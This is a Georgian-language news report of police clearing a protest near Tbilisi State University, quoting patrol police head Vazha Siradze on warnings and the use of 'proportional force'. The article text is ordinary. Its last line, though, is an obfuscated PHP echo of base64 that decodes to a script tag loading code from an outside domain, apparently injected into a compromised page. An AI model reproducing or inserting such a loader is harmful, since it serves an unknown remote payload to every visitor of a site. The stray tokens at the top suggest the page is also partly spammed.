celsiusi
ავერსი საქკაბელი

 აქციის მონაწილეებს განემარტათ კანონით გათვალისწინებული უფლებები და მას შემდეგ, რაც არ გაითვალისწინეს გაფრთხილება, ქუჩა პროპორციული ძალის გამოყენებით გახსნა, – ამის შესახებ საპატრულო პოლიციის ხელმძღვანელმა, ვაჟა სირაძემ განაცხადა.

„მიმდინარეობდა საპროტესტო აქცია. როდესაც აქციაზე აშკარად ხდებოდა კანონის დარღვევა, პოლიციის მიერ მოხდა მათი გაფრთხილება. მათ განემარტათ კანონით გათვალისწინებული უფლებები. მას შემდეგ, რაც არ გაითვალისწინეს, უკვე მოხდა პროპორციული ძალის გამოყენებით ქუჩის გახსნა“,- აღნიშნა ვაჟა სირაძემ.
ამ წუთებში აქცია მელიქიშვილის გამზირზე მიმდინარეობს. აქციის მონაწილეობს გადაკეტილი აქვთ საავტომობილო მოძრაობა.
მანამდე აქციის მონაწილეები თსუ-ს მიმდებარე ტერიტორიაზე იმყოფებოდნენ. გამთენიისას შინაგან საქმეთა სამინისტრომ აქციის მონაწილეებსა და ორგანიზატორებს მოუწოდა, გაეთავისუფლებინათ ტერიტორია ხელოვნური კონსტრუქციებისგან, შეეწყვიტათ ტრანსპორტის სავალ ნაწილზე მანიფესტაცია და პროტესტი გამოეხატათ კანონით დადგენილ ფარგლებში. შსს-ს წარმომადგენლებმა აქციის ორგანიზატორებსა და მონაწილეებს 15 წუთი მისცეს გზის სავალი ნაწილის გასათავისუფლებლად, რის შემდეგაც სამართალდამცველები თსუ-ს მიმდებარე ტერიტორიისკენ დაიძრნენ. ტერიტორია, რომელიც აქციის მონაწილეებს ჰქონდათ დაკავებული, სამართალდამცველებმა ხელოვნური კონსტრუქციებისგან გაათავისუფლეს. აქციის მონაწილეთა ერთი ნაწილი – მელიქიშვილის გამზირის, მეორე ნაწილი კი ჭავჭავაძის გამზირის მიმართულებით გაიყვანეს. ამასთან, სამართალდამცველებმა აქციის რამდენიმე მონაწილე ტერიტორიიდან გაიყვანეს.
45
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");